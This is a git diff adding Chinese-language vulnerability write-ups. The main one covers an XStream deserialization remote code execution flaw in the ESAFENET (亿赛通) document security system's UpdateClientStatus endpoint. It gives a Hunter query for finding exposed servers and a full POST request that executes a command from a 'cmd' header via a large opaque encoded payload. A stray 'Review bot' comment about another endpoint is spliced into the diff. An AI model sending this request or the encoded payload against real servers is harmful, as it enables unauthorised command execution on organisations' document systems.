BEJFEGAEIPMBPBIHIABBILCOGDCPKHJIPBLCLJEENPKOJLHMALCEKELIPFFLJNNBINAPPOFHPEJDNNILKCEECPJIGJMKEJCNPEKJMDKPLLEHDDIGKKEDEPFHIJKKPNBBAJAMKNMNHIJFHBCKPKAKMAKCHMJJPFMFCFBKJMMEBABPCGCOCNKBJJPLMPHPJFLJLDABHNFFBOIGNCOFHBMFKCKMMENEJCPDOBPMAIDHBNKIAIGKAAHDCAIBLBKPNNLBNMEDCCOBGMDMAHJPPENANOCILDNELHNCIEAOMGKLMCLLEDDPNLDJNBFPEJOKCNNCJHKAPOCGFGENACAGBNBDEIAMGCCGKDNOLNKOCNMMABOMGGKGOFFOLKALPKFNMJJMEMMBBIAAFAAFPIBBDLOENGFIJJAFHNKKIDCGJNIGAFPCPDHPJAKCEKCCKDAIEDJCIJGMJJLEOEDELMJJMEJCCNEIMPDKIALLHFJNNGHOMIJIDPOCLOMECDFMEPAGLKNKEAPKHCBCFDINJHAGJAGPCGEJJEFAABLOEHMDIIGNKKDIILLFGPMBOIKEAAAJGPJHFGAFFPFEPKIKLKBMKLODNLBMFIEFPGAGFPCDCPJACDAEHCFOGEJHHLLBLBBDDOEEJJBPPHDCCOGPOPFOPCFJKBGCNCLLHNAJKIKLHKKIJLAIKBHCMBODNCPCLNHDLMHDPNKGIBANJJHCFLIMKPFOAIEDBDMIBEEPIHODEOLGAJHBNEOGCKIBMGIMJKLAOFAIACFJGOFEIBIOOPDCDCNFIOGCDKEGHEIAOBDCKLLGMEOEKIEHCEBFKAGOLFGCMNLNMJCNJMDBHMDPEGHHFKOJDDAPPHJMBLBDODOHKPNABBMBHMCCMKINKJLCIFBIPCENLPLOFOAJPEFHCDEOGLGFHNOBFFLHDMHNEFAIPMBJJMIIDAEAJAKGDIHIOIPIOPBJKOLEHJLBIOLGLBMHNCNDAHOGDOILIJANBPNLPPKCOKJFJPCLFJPGKDCBMGEOGGGANMMKDILOMJJLPKJJCOPFKPFAHNAIMDOKPCIKNEMFGMGCOGGMKBIBDEKDAKBPBJKPAFGODBFLGADBFNMDAHGLDGNFLLBONBDLAAOIIICMHIPDJCMHBGLFJAIMIBHABENMJOEHJLKGIIJDBBEHFJCHAPPIDAIAILKODLCALBBJNPCGLPKIEOLEOMKEMBLMLBEGKNGCOKOFIPBCFAAHGCIMCAKFFLFIBDHCDFHMKKNDHLCGIMMNKMGOPFDMJHCMOGLKPICOEEDDKPAHLEGOMDMDFLKFECCPILAKGLGDEMGMGEPODAGGJPPNDCHOBPHJKBDAKECOBIOJGKDMBKDBFPEGIGNOBDGELAENFFLCBKHHJADGFGCBAINLJPDMOBGLNNHAOBHGLGMMLDHGINFFOLLALGGAADPGMNJDMNOLKINDIKKIHJKDEKFAJDHPHNGAIBGNAODMICFEFCCHDPGMLJOGIJCIOOMMGEKPILGPFJOCMKILLFGPEAIBIDBGNPPDHLLAHMKLEJBJFBFPFBDNEJCNPK +``` + +![1706605356017-ab5cffba-7228-447a-b907-34a14be56302.png](./img/k6HgGvFP2_AD6epE/1706605356017-ab5cffba-7228-447a-b907-34a14be56302-376758.png) + + + +> 更新: 2024-04-20 22:01:33 +> 原文: <https://www.yuque.com/xiaokp7/ocvun2/yh60f64ymxkagf0z> \ No newline at end of file diff --git a/亿赛通电子文档安全管理系统UpdateClientStatus存在xstream反序列化漏洞.md b/亿赛通电子文档安全管理系统UpdateClientStatus存在xstream反序列化漏洞.md new file mode 100644 index 0000000..940ea48 
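Review bot: the request template for `POST /CDGServer3/UninstallApplicationService1` depends on the `cmd: whoami` header to carry the command to run, but the text never says so; state that the command is taken from the `cmd` header and that the body stays unchanged when it does. The body itself is an opaque blob (only the letters A through P appear, so it looks like a nibble-per-character encoding of a binary payload) with no decode or generation step, so a reader can neither audit which gadget chain it carries nor regenerate it; either link the generator or describe what the decoded document contains. `二、影响版本` only repeats the product name; give a version range or say explicitly that it is unknown, since an advisory without one cannot be used for triage.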
--- /dev/null +++ b/亿赛通电子文档安全管理系统UpdateClientStatus存在xstream反序列化漏洞.md 
@@ -0,0 +1,36 @@ +# 亿赛通电子文档安全管理系统UpdateClientStatus存在xstream 反序列化漏洞 + +# 一、漏洞简介 + 亿赛通文档安全管理系统是国内最早基于文件过滤驱动技术的文档加解密产品,保护范围涵盖终端电脑(Windows、Mac、Linux系统平台)、智能终端(Android、IOS)及各类应用系统(OA、知识管理、文档管理、项目管理、PDM等)。亿赛通电子文档安全管理系统UpdateClientStatus存在xstream 反序列化漏洞 + +# 二、影响版本 ++ 亿赛通电子文档安全管理系统 + +# 三、资产测绘 ++ hunter`app.name="ESAFENET 亿赛通文档安全管理系统"` ++ 登录页面 + +![1693912211487-1ee3eb84-62a3-4c32-806a-6be32537dfb6.png](./img/QzrzLUujmmYPkzrW/1693912211487-1ee3eb84-62a3-4c32-806a-6be32537dfb6-333987.png) + +# 四、漏洞复现 +```plain +POST /CDGServer3/UpdateClientStatus HTTP/1.1 +Accept: */* +User-Agent: Mozilla/5.0 +Connection: close +Accept-Encoding: gzip, deflate, br +Accept-Language: zh-CN,zh;q=0.8 +Content-Type: text/xml +Host: 192.168.110.187:8090 +cmd: whoami +Content-Length: 14756 + +NNLINELBIIKEOGPIFLNMHIPNNOHFNECLEHKBCIHIFHCMONPDPHOHMONIOCNLPBOKNAEEBHFCIFNMDPDAACABKCKIAEMBPOIBGPMNEIPJAOGBILDKMLDGAENLPAFBKFPFELKLGCEBMBMNKOIBMPHCIODCCEHOKPCEDHPNLONIODEGNCPIGDFMGMDPOMMEDIJNFKDCHHBFMFGBDOIOAHLOHNAMDBJABECIJOEHKAPJCBDIDJHKAMAGEELEHJEEIDBDILILANAKCIIGLMDIDDMOPNCNGLPPOMMIGCEFEBIMDHFAGLHIDHPJCHAEHFPHNHJGJKJDCINLAHOAPCDJNIABODKBFABJMFIEMLLPGGKNNNFCAOBHCOEOHCBFOFGBBPLKPHLLNOCJAKJDJPOEPBEKKPHOPBHFLJLNOGLABIJHIBOFFCPCLPAGLCEAONCAGIJFAEFOLKOLENHNFBOJIAOFJKBFMGNKBEECKKJPCECMFKPPPKEGOIOBHIBIBAGBIKAMOFLEKDKODMHGJOCEPEBNIHPFKEKKMCENNPHEODFNIOPMHFPPNFFIJEEJPPIMGPKHDOACKEEJACLCOKIPFHHECFDFJNMIFNGHLCOFLPDACOOALCNKBOEBPNPCKCKNJJJJANLFPKGLOINAIODAJNHAEDLBNONDJHPFELIJMNLMHEMBFGOHELCDBFHIFALDIIMBFEOHNHBOIOMLCJKCPHJPNDLPHDDCFJNMGKDMEINHIDLEGMOCNAFDAHOMPPIFFBPFCHAPPIDAIAILKODLCALBBJNPCGLPKIEOLEOMKEMBLMLBEGKNGCOKOFIPBCFAAHGCIMCAKFFLFIBDHCDFHMKKNDHLCGIMMNKMBJDGIDJMMGEOEGJNJDNNEKFDMEAHMILDKIFBGKGEJCMGOFEKGJEMNAFLDGEEOBKOHADBAMHBMDJOGIFPMDKIILIGAEELNEOAKNEFHDOGHOPBDICEALJIENFKHFCEHMPBJLCFPDHDGBBFIMKHLLFIHONFDJAIEJJLPPFMAEHBHDEBOIDLCMCIKAFBEBFEBGJEECDEINCPNPKIENONIMPBJCCMCHOAJHHDKDKEGJGDGJDJIDEHNNLNNHEONJEJHNLHLPMBBEJDLLJLLNPKIMGHLOFMMKBDEBHNFLPGEOKMHOFNBLLAALGMKNJONNGIOJLBFECJNLKHMBCKELDPBDMBFEHAKBHEMNDFBBEDCAMMHNNG
MDGLNJHJDAGPILNGBEDCDJBCJOAMOBIFLOFCFIJKDELPPFLFBOHHNIBEGOOFEFGAENOKBMPCBDELFJPAHICDPGANJALHFENMFHAJLNECAEGOGCBOIDLJENHCEDMAOEEOFKLDEBJEJOBCFLPEIEAGPOILBEGOKPOAAPGMICFMFLJNDMBGAJJPKNLIBOAABJLNADADNALIKHDJMDKGOPELEHGPDGNJHAAJKICHBFGMHCLEPFHCCKNFKPEOMHPLMOHBGDHCOGEIGPMIGLAHKBCEDHFGLDIKIIIMEPHMIMCIGJJDCKIEODLKCKOLAKBFHIBHOPNAMPEIKHCMDPNMLACKHOGJAEMBJPFEBOCPBGGAFGGNCOBEAIPANPLIBGDCCNMDNDNOIPOECCPELCEDPGCNJHEIOIFPJDKIFNJGHAHLHFNPICIJLHELMODMJIEGMMBNMMFBEJCDDDFOPAJOMBNKBDBGKKMLKCBBPFOOJCKFFIMLCODLOFNOIEHENLJNOFDAMKFLHIADBNGANHIANHOCHLILNJLOCOHFHMNFHALJHOPGKLOPHLMELJFBIABENFKEHCLIKMFGHPPJFIBBANPIOFKEEBIFIBDIIAIKENFILIDPDELJDMOPFKBOHPGLIPMNCFJFDCJGKCFOAJMPIIBEOHJPPNHLOCINIECHMJJMCKHICOMIMLHJAOJIGIFLMINANOFADOGDLLHCEKPECHDFBGIPEPNJBJOGLHDLKFLBFPLPFAENMMIFOMMNCJGJJFPGFHOKMAGCEOCKMJJPPAFBNEAKOAMMEHPGCBAJCHDBGJANBBHGIBMPHAMCEHEFLBAGOKDPKIPPDFLJIADKKOJPEPIGAKPCGKBNFBPLLKLEGBPJJCDJFGHDMLPNJBGFMLGMCABONHBLHPKHKEGJIBPFKCLMBIKKOMINPAJEPFHANBIBKMPHKEODCBMMIGAEFCENBNKDONGNLBADGDLJBMJGKEMNJOMPHDOPALIGEPCEDDAHJMNMJBFLIPBODEDCDAPMNGCANOCPLLMJOCPMPJDMEAMEPELICJKJLODAJEILBOJNFAJOFNOGCHGOJEGMGCPNCDEECKPAIAOHCLJBBFDKKAIHOJEKDBOFMFOBEDLNGJNIAJPLGMHBLHODIKDLEPOINDPDDIGKOLGEOBFFPMOHLBEALFIGAKNDKEKEJMJLNGHNANLCGLPNLBBFNKNEKCGBJKJDABFNAGPDILHBAAIECKBLKEDIJIMPJOMFLHBMOBLEKNEHINHAKBOHICLGBBPIEJIKALMIJHKHFIDNICAEEFPGGPBCBFPOJDFFKAGKAEOOCPMGCCMHPCIKHCODDCNGDDNDLAIMAPEMPNECNFPIALJELGOIHECEKHBHOHNIFCBJBFAOKKDCMNHHINAFGNECFPOGHBNMPJOECCFOCHICANBDOCCELJCENBMIMBKCNJAEMBHLOJOGALHGLLOEBFGFJAOFJHEGNLCEBCHGLNFEEIDOKIJNDHDANFPGLEMHOIJHOOJGKLGHBFBMBPBKEFOAKAIAGDMBLDEKLFKADKHNPAKBNPDKFIOAMAKKEHFNDABEPGKBMFCDFFOCIPDDEBOBFONDJFAJIJBAMGNBMCMJODGEGKIMIOLLAKMKJJAOCEMOBDCODALCKGKKKIADHOFMLNDGJBEMLLJPJOKPAIDACMPCOKAGKLIIMDENPNMEIBBMIFHGJKLKGPNOBJGMMLDKFKALLFHFDGDBDBMPOPDBLDNMAALEMAHGINFECKFHKJHFOCDJNBEDNGJCNENGIDHBJOLHEPFLEPHOOGJKFEGFLEMLGKDOOKIMAJIBJKOLAKCHBJJFDIGEMPABDNJFGMDAGEDIOHJKOAEHPLIBOFLIMFIEFOOGDHDNLCKOKPEDKEEBPAHKFMKBNNBAMICPOPLNPIGLMPDLAFBIEPHPJBFLBDECCPFINEBGMPMECAICGFLMJEKEIKDOKJMOAJLFNHHEHEPDAMFLNPKCDPOD
PLMFFAMILMAFIDBDJJOKIJKGJACMOMEHDDCJJAAOAFJDCCEFHKMJNDJEOLOOIHCFIILOIGCOPDHENDDEODNJAJJFHNJIBJGJPFFKEDPBJAKIPHPKELOMHNFABNMIMODOGPBOFLLPBGAHCEOBBFJLKNAMKACHIOMMFLAPFJCHBIJAAEJELEFFEIMAMCACJBBGADJDJKKEHMGJCPCNIMKCPGHBPIFADBGGBPCIKNBGDCJJCPMABJINOGLAPAHGLJLADBJKFLNAAFKFOBIJKCFIDEKNFGFCHDPGLKFDKPPHPNCFIGAMHBNHMLJAHOKKFLNOCNDNPPJJHBBKHDIIENFAGAHOMFPNNBGDLDEHLBDOKEOAEFPPCIEPGIOAHDEEMIKDPHBMADGLNILDCIEKELEBBEOBKLCDLKLKLLKHDHBHGDDLHOHGPPANCDABBHHBDOOLEOAKBKDBPGLKFFFFOBLBHAPEELFFDEPOFFHIGOGDKMBIAMJNNOOFGCNHBCCCFKCAOFDDDCBPLMMHGBLEDOPNEHBOECJGFMFOEIEIFAHLCOOAOLBFFKHAHIEMAEOBBPMBJNDMJJDMNJEMBGMNEPCFODGCOCKJICOBEGAFJKFADJOFMGPILCDMBFLLLAHEKPBCDJEBMHDLBLDLLCIAGNJJBFHFOIPLNNOFAFNOMFPBPNFLPLFFNNBBNEPBHBKJEOHBJPMOHHEKFHGACPFPDAHPCAPPGPKBJBGGNIPLOHFPAPHLHCJJHNGNKOMDMIECKACEPHCFJJAIPLCEOFNLBAFGFLBLNBPAHBOOJOKHIBAJFEAEKBNHHODNJNMEONLHDIPPCJJAEKOOELNHPDPAEPPBILHLHELMDHGPJMILIEOFJHBIJHAIPPKCIJKKANAAKEDNDAILJPGJLIBJMABMPDMHGPNALCCAIIAMJMFGJDOIPEFEBMMOBABIKBMMHMFHLBEFFLAGJLNMDEAOALFJGOGNFMFEFKPMNCNNEFMJNADLNIILEGKLOOHMBHPJJCNFBPKIKMAIEIANCNDLOODENILDEJELHACIBBOCINOOFNPMINIFDEFMPBNDMFGHJHNKCKDECBJIBFMIMBGFCIHDJAKCPNAPNMOIKJIDLPJCIKNOGJDBALIDJPCNICIAIPNGPCLDBGPIFLGDPNDOODLHJPLHFILLLKDJHHDIBODNIPFLCAKAFMGCAAMKOEOPLJAAAPDAHJAJHIHGPDFLNALHAPHIOBEDFICNIHJLFALHJKNLFLBKIHIFNAIIFBILLNOAIOKFMLEPDIKMHGNMDLKBIEGLFHDNPPDFPEDPGOLPICMJPOFEAJJMHGKPJEJNEMJGIPKBDHEGLILBLJIEICMNINFCHAOGJNMIHPAOJCCFNJHGJCJEMJJPCNFDKKGDJCDFBPGNKGDMPEBIIMLMBBAOGBOPAEFOMIHEJCKJGBLFFOGNGOFPPJEFNPLFPOGPICGIKMGPNIKNOELEMAGNHKHOIKAILJBMJJIPABBGPICCMPNFPHHFHKDAHJKBMAHDBKLAJKPJFHOICCDFKJEDGGFDKPGJLKFJJJKCOANLNPDEJLHBBHJJGMNJPHFCHGINMJIMBDCBCDOHKDANDLFDOOCEADNHODFKGLBGAPAAONECAEACNDKGFGIMDAAKMLJJLAGKCJDECINGDJAHONECBMFDKMCKHOKADAPGBOKOGPEDFMHKFBDEBOMKNMELIALJHOHGOCAMKJCFECMNCODNHGIFBFIIJMPEHGNBDNGHICBLIGCOPDHENDDEODNJAJJFHNJIBJGJPFFKPBFOBDLLOIBAHALODFMHODOHOPGPMGLIPIJONOFCGMELPFMKMMCPFFNMILJFONAACCBCIJFCAFHOHLBALEIGHDPMMFMFIHKJBAGGGBDEDNCDHEJALEBDPIIEGCKGKMPLGKJGEJAJPMIFCDBAELNMDPNKFCAEGJCAFJPJBBMPLMEIGCNPOLIGHCLGMEJLKCHEPGBJCCDECFMK
IBLFIGOFEJKPGAHIGOHNOKMLOHLKDIPAPMFOPBHDBMAAEBEOKBEMEHIILJENNPKHJIMJMNLGHMAENHOHGMEFLKPJJBHDGLGAAMIGDMDCHBMICMDKNGPCOPEKDEMFLKINAMOKNDLDBABNGLFPJHFMKMBBCAEJDENPHGJGGPLMIIHHIAHGIBOINFBNCKJLJIGEPNAOGJFAFPDDBHEBCKNNJKJDLBPHHDNNCEDGAKHGOKPMCLOOPIHHNFMNFOILEAOIFGOJGPDCBLNGLEIOHHHAJPFPGLJNFFHKCNMFGHAHANBJLHJFNNLIBEIFKHJHMENIIOONPDMFOCPKEDHHMEPHAJKGALDFDBOFKBOCDDAFLJBDIENKOHGJPHGLOPDMIEPDBHBBEILLFPOAKJKJAPFKAOMLFOJBLAAEAIFLBOMGECGDBILGNGBEHDEOFLOLHJKAOJMJKNNLKNDHAPCKCHLAFHMCCLNNIIGJLDLCCOALPEPPNEBDNPGEMMPFFALFDONIGHJEMJGJGPLKDKMBGCLJEPLHDBOIKMNGELEKLJLFFAEEEDMBJFLJGGHMPHADEJEJLKJCMLNFIELFBOKAOPCIMCEBFNGMECGFAMMNOMCHKEIJGGNIHKPBFJLKODLLABGBJANDJFBJNBDHIDNGJGLAOFHGFBMJAFJNNLKNBAALOGIIHFMIOLDOEEFNNJDFLIMNBAHJGPJBDHIKGHCDMMLKFOHOJFLOLHHCEJACKLGHIBJHJHGMECCLNHBDGHFNPNOFEJKKOMEFONNBANBKOLDEMFCMDLNLGDBFEOIKAFJDAHAEJHMIJGJFAOJIHAIBHOOEMHHCOODAIEOEBFLMNAMDIIDLDHAIJDBKCMGKJFHHFKKGABCJCPHBBKDBPGLKFFFFOBLBHAPEELFFDEPOFFHIINLEMPICLDNGAEELNGONJIKOPFIJBJIPDGPLEDMHNJJHLBJDDGNDIHECEJNEFNLEHNHFCFOEEEGFIOKCPENDLNJJHGFJGAMNFLNFFIMPGKEMKKAMEPBAHBKBHGGIEANHFOKPEDDNLADKABNLJPONGDIGMCLENLOBAKMEPODENJNNDPEOCCLMLOJDJPPPMEFLBFLAIDHNCCHDDONIDPMKIOAGODDPKHDBGFCIGOAFLPBMELEPDHECABPOFMOKJECEHKIJIKHLCEFMAIGEKAALLCMMCDLPHELOCEDNIAIIHJCGFHJFBBKFKCFOBAABJEIMEIMDPEPCHKEBCEMIPECMAJGCEKHGOKOGFNHHFMKOICKKBKKKBDGDPCGLGMGALDDMEEFILPFOCFHFGIPOHKADHACFDJCGCKPANCHDAEDMNIEACGEECCNIBJGGIENIOENAFDBNMJCPJDDDKGDLKMCILLIEKBEDADHHCMONHBAABOGHMPNGHHEHIHCBBJJINCFFJKKEHMGJCPCNIMKCPGHBPIFADBGGBPCIMBDPENPCFFFPDGMKEBPFOOFFBHCKPAGHGJJELHDFJBCKLMAJDCJIIILHKBHJJMKOAOMLFOJBLAAEAIFLBOMGECGDBILGNGBELIMDAFIFCBLHDHLCJLMAHCOKGMKDCLKKOGKKNDDAHMGGIAKGHAHPNADHLLPPFDJILKFMIHHPIMLOGMDHPFJHPMGEBKHGHLFDKPIKNDKFLBNHOODBEAHNBBDBALEJGOLJHFPKEIHMLKAJHBNICKMPHFANCLPNFFLDDHEKKOLODMEJOIJGPDOPCGDPKLNDLPBHFGIMJCPMLPCPNPCJCKNJBCJOJIJCHDGIDIIJGKMKAICADENFOEEGHJNEHADCHNEMABINOIIGAGNGNPNCPALKIADLLJBEMOKJEGPNELELFGCIFOMAFBPCAKEDHIGLMFPFIHGLFPIHFAOFBEIIDHKDCGIGPNOICHCLEAKLHILHDCONAKMNHALCLFLNOBIMBCMKNGHPIHGDEIGGILLNIHDPACAJGHBEBEBMIDAOCAAKGMNBCBENBLGLLLOKMDMJ
ANECALMLPLJNKGJKBLCIPBJBPMJOHNPOBPOBCGEMKBPJABNDBKCGAFALLDPJHHGMOGDJDNEKGJBMEIBPIJIOLDOPCEDKDPACBAAMDFLLJMFEGLKICDEMPCHMHIDFKFKDCMGGALJOLJEMCGHMKIMJPOEFPGECHMGBLGGGBJEHBDGGAJEALPEDHDGJPPFLLAHGGKAPCNJCIFBLMGGCKOJLHCHOIMMGEADLOPOPLIHPEPBAHNKNAKOFIMOBBJIBBHMFDNDAIIFMLPLABGGJEDHELLDPGHIGOECAEMDJBGHODPCNEDENIFPEHAMJDPDEMNJOACCBGPPEILNOKDFHCNGKANGBCDCDNGEIBMJODCBPJNGKLECPCHDHJEEDHNFJEKGLMAFKCMKAMJPDMJLBGLPEJLLHINCGOCOENMLDKLDLHIDAHBBINIEFLIFGBJGMGMDOJDLFNMAJDPIFGICFKKIECPIPHHBMAJJGNBPCKCOIMIOODGNDMKKMLKFIDHKBFGDHLGANLCJCDEMNPGCGPIPNEMIKDJJNKECHEJMCNAGDJNGIFFDPFGMAKLPLPLMOEDIEIOIIKMFLNDFDHCJHENMMAAJOFJLGDIAHBOCLMAGLPKKJAJGFPDCBJPGNAAMNGNNFDHDPIEHFFEPPJOMADEBHBIGFNOKHDKDNAIAAKLIGFNIFDKFMLJANODMADILHHONCGNLNJEKKAJHPMIDGHNJJOAGGFNKCOCONGBKNDNIJOLBGLGPLAKGCDIKIBNPMOACDBJLDLCNDCKFOJKINIIPBNBDHMNDEILFFCBIEMNMHCACEDFAHNMJLDEFGMJIINCJDNOHLDJIDOKKPCCENOHBDNMCGEHGENDBBBHFOFIAFGGCNKOKLMMCOOHNJEAJKILLKFJCEKEEDJHBGIMKLOEANBKMBFLDAGGOAIHNLDOPBPCHGNIDHGKFAMFGKBIIENFMJLHCGEMBKNJPMKDFCJCHFOLNOIPADHBEPLLHMNGEBMBHNLBHPIGHGPGKCPFOEGAHJKPIPGGMPIGNBDDIHKCLOFKIBBBHNPBNCLFGCHPOMIENELILEJPLKAHBJEPICAGJMNOAAOJLMPDBOOMEOFFAMKILAJANPCKENJMKLFKMBGOKBNKFGEGAEPEANNCIEENEBEBECBGLOKHEJCFCKABBAAMCDKCIMJLILOAEKHNKPCGOLDBBFFIGDHPDHOFNMLANMCHBIEHHIBHOPPLOFEGOAJLHCHPHGKLOCGJKKABNHLEHGKOINGEDMGDMCKKKLABBIOJCGANBDOCCELJCENBMIMBKCNJAEMBHLOJOGFLKJCNMEPJPKGKPHDGHIDCKAODGNNNCDKEDHLCIANLKENHMMDELDNBPNNNPHLGDDOLGDFPHOHFPBKMFEGOLFMMAFCNCDLMEKPKCDJNHIOJOOJADDHHHPPLGLMINICBIOEIALHBBCEGACCNDNOAPGNAGELEPGCBGLAEOPFGGIJBAKDFCPCCGJAHBDAJEPBCFMNJIKADAACMEFNBCBKICAALEICBCKEKHPCPDAKMDPGNCBBNKDFICFKKJEGOEJELPGLECFINPMBCCDLIGEJJALHPNHDAMIFEGJOCFGFDGBNJKHKAMOKOKKLIFIBAFAELPAPCHFFEOEBNFMLGPPMCDHDIIABOBFDCPFOMMNCJGJJFPGFHOKMAGCEOCKMJJPPAFBDLODOABMLPLAMCJIFGJNHALNOJMBLCFJFCDNCHLBGHLCAOICIJGDLGDMEKPHHMBOHAJJGMAIGLPIEIHHLKDOMBJMOPJIKBAKDHBBJLJJNPOHIDBAFAGMBLLPIEHENEMHNIFAGMMELMAJHCLFCDNFKHGEJFGGEIBKPFAFHFOFHGMCLLGCAJDGGJNKFBGDAAEAJNGEOJBBIFLLKNJIOJNHCFKPAPHGABENLMABGDMFOEEKIMHOBPCLPEAGNBFHEOMLGDDLDCODAJIEIPJNHJFDPHILIKHMHJHBJBLPNPPPJOJJ
BDJHCPOCLBIBBPJLLMNKIOKPHOFJKEJAMOBGCHOONMPJNEGDMNFPKMNOIOMJPEPDNKBODKFCDGJMGBCNHIGHFODOJAHDAFEDKOGGLMEJCOACLPIMCMPLDKDAPFJGGECGPNCEDGAEMJADOCGBEFIIPBMJMMMPNHNAKJOBMOIMMOMEBOBHPPIPAHJHKMJADIIDCIGOMDJBJHMHCGFJLELPFOMAFEAPHLHCCKKNNJMMLKIJEBGEBEDOOLIFHLKHCOONJMHCAFGOKNOAAKONAAPPMONFOJENLNEPGBJKLEHIGBDOAIDKAILCHIFPPGGFLGCPINADFPDCGMIHHIPHBCPIPHKGMGBPEICLDADONHGOFMMAMLAAHHMBIGNNOENIOJLMNGNMMKCNGEKEHLJHHCDFJKMDOGMOLHIEHDOCNBPILJOFBNCDONBOIHDDLALGCLOBNAFBDHNPEJJODIENCOCKHGOHOOLHFNDOFAEPCHOJNFJJNHKAIBGJEGDBHDFJGHGEPIAGPJBCCCAKMHIFDDNEDMCAOBCCGOHCMMADMKHCKIACBMGFKOGDNFGIGBJFFFKJFNIJAPHIMHKOLLIECAJFNFLJLLHEBIBLIOBOEIMNJMIJOCHEBEKPDJOCCMGGEOKGOMOFPKAICOHBGBOEFIIIAJKPEIIGBGLJCCAHJNKJFILFICJCPAICDGOBJIHMEOJHLCNJBDIEHHNDGKMKLLDLMAJLOHECBFJEOHKCABKIHGEBNMAGAODODMAOMOBILIIGCDKPJOKLAFLJLENBFFNNAKANMKNKNBNOJBKEKODPBIDDCELHBDDHCKEELKFLEHCNEFIAOJJHHHKIAGDJJGNKODKIGJAGBFEBMDEOMCHILDNFEEPFOGPPAHEHACDCHDOIDELKKBLAOJACMGMIDOJIJLPAOCLLIIFPLJDKCOEIOPBEAHBLGNHJHPLNMFFMKEHLOPIGNFNJNGIEPNELLHMIIGNPODEDCIHCIJBNMENKGFNOMILCBMELHLHNOBFLJHDIFLHPCKEAGJJNEAOBPNGKECFLDPPMCCLMNMHFICELDKEFNPMJHNGOKLOBHONELNCPLNDFKOIJONIBBBGABIANBIHHJDDLACPJEENOHCCDIJAPBKNNOECPIGOIMNMMPOGNCEOGDKNCCBHEEJCLEFMBEMEJICLGNHNIPEIOIAPKJDGOIKGEBGODFIGCHKCFFLPGFJBKDJOIMEJEHEEAOOJGLGKKDHGCIGFFOPILPFENMOKOMJLODFBNKOFEJKICAMBGPCPDNJOJDALNGCOFDAINHOAMCNLIIJEJENKBHFDAOFAAPJKBONHBMGGKAEMGHNJPCJFBDCKICEIELCGDJKIDFAKAFEHEBOMOBOGFDNEAANCAINACLGFMMFOMGCCBNLDCCPGLKNCABNEDFIGKDJHAEJIOOACADPENHDNOOKPILJCLNGMIIOPICHFPACILNJNAIEILINONKDMONACMLIKHOMPLHAODMDPFDNNKDMPMFEIMBOIMLOLCBBGOKONLDJCDDHGHIIIHDOLIJMGPFKMMPBDDPBIKJIBPKDNHOAHEFENPMKBLHOCDKLCKIMAOFHOEDNHKFNKKGHCICLAFKOBANHOIHACPLPLBCEJFONFMMGKINEPMEAANNFKCFODBDNAOIDMEFBLPBAIABHFJBNGMIKCJFGLPEHNDJHMGKFPPGEAFHEBFACNBIGGEIKCPBGIKHHNEAEMOAKKEMFKHDEBEGDDGJJLCIIICMNIDNMBIKHIDLJNCOHFENHIFNKJEECDNLHMPGPGMJMGJIJHDBFECNLMLFCLDFOMCFNBJELHJFFLDKGNOIHKEIFCBPOPCBGIJENFHKCNKOJMFBFIPFGBLFJCFPFNOCKGAADPFFEJFDNKGFMEILHBFMAFBMBOFNDGOMCGNIGJGOBPEOBPEKGPMMEMHLHMMCNDCDFPMACNDELNHGCALNPHHNFFLNAKEEEELCDLHDHBFOJBJFHBO
JNBGEOLIACBICKNMEEGPBEKIBEEMKGKLDAKAALKOBBJIGECCKHILNGKJLKGJBOPOFHCNHBKFPHLLLLMNNKPJADFGMCMPLILPCLOLJPOCIOOPOAPPMPFOEPNFGEEDALHLEIHJFAIHCFKLJKCBAABOIBBEAGAAPJJIHIHIACHLKBCPMEHCDGDPKPMALDBADOEKFMDFGAPPGNNJDAMPMNBAEHLLGIGCOLKJPGANBJODFEMFHHDAIMFNNIAEAKLKBBEEADPHIDIINDABGNKNOODAGKLPGAIOIFJLONMCNGOMOEALKIIJFLAHEDDNHDENODGINCAGDBFAAECFCNPBBOBBIALOHDOIOMMMJCAHMEFMAGNLALDIPAJPHLOKCHJGGLGEHFJKMDEAHEGABCCMCFOBFCMGGKGBCCBPJIJJNHNAPPECAPJEHMDMOLFIEOIFOFFGKCFCNFAKAPGBMEBJGIDLDBNHOLJGLOKOOKCNHGLNEGNBKHFDOJINFAPPKMMOJCOCENEHPCGDNKKOJFPBNFHIDDHFPHMCOAOKMOPHJNOJCFOJJGOOLNCKAHBFDPIDMJGKBHHEAIOKPJEAJJCNJFMMCKHJANGDEIHKHBAAFJCJGGECNBIBNLBLFMBGDJGHJDPMBIMPJLLBNNANCJJHBJBLEPGNIJOLGJLCGEJKNGBLDLGKMIOANJGGDPHHCGHLENGJHBANCELNLNNBADCDDCDOENGLFGIEBCMHPFBLOIDMDNBCAMFMCMMKCDKPOFBJFBGCMPOFAPCILIPFJDEDDAGKFMHBBEHIHOAGDKPONBOADJEIKKBPNBAPDNOEEEFONAMIFBLIHLLKOLEFHKPPKONJOCFHFOAPIJGMHKPHGIMBGOBOAOCGLMGDLIOPIJKFJIPCHAJEGJFCPOBLAEDFFGIMKEIPDBKNCKIHFHCIHDFACJMOGHMONMPPDKODNGCOBFMKBBMIEFGHOKOMDADNGANEMKDFLNMCABMOONIFKFEGDLJFAHLOODEBNBKFGPLANHIJFFDLBFJDCJHMPCPHBDPFICAJHCBBKLNLGEPHMCGKEKOLJBIIAMLMCFBIGACEHBBLHAIBBODKEDBPKPADPBJIKCGFCKDHPKCGELAMHIFEBBICMAGHPDCIIAJMBKCFMHJDHIPNNHFJILAIBPKKGLOEONLBLJGCIMHKAJCAHCNNDBDEJNDGFNMEJJECPFIONGEMLMOPEDNJDFBAHAEBOKMCNEMBEOMFIFCKLEKNLJOAINFFJLKPGPLHJMAOMLFLGDPBCIIPPPOHNMKOKPGEMFEOLDEHEJMPIOIAODDNJOFGLHNDAJICAOFOJKDDFBMMJJEIAPPNDBAKMJIIGNHJOPHKPINANLLLBBIGNIKKHDLKLJGOPKHGHICEACMCJNMMDJGBNACEOFNBDNKAKIOMHPECJEELPLNGPGMPHCOJGOFBENNNKIEKOJHKDAFGBAKHGILNJMMOKHDMIDIOGGKPFIFJOLIDDEGFCLKGNICGHJOINJCBOPOBKNAIDEEAGGLCMCEGPGEDPNFIKEADDPPINJIOMFKGCMJHDHLGMODMMGCNEIGNGGEMLLABHCCHGGDPGHJFBJMCCFGJCLCFCDJEBFMDMIEDBFJPKLONGIHJABFOGBAALJKCADCBOMDFAHLBPIJEFGLGOGPEAFAKFJCALDHMICDCIHPICLPEANCLCBKOIAMEHHLFIJHPEACFCPDDKCJHMNDBHEHLHBHHPEEACDMICBKGDHODHPCMLAMHOEJKAOODJCIPGMOCGPOAFJDDLGCENAKAFDBDEOKAGLBHJHEJEHCCJEFMIFNJDPDFN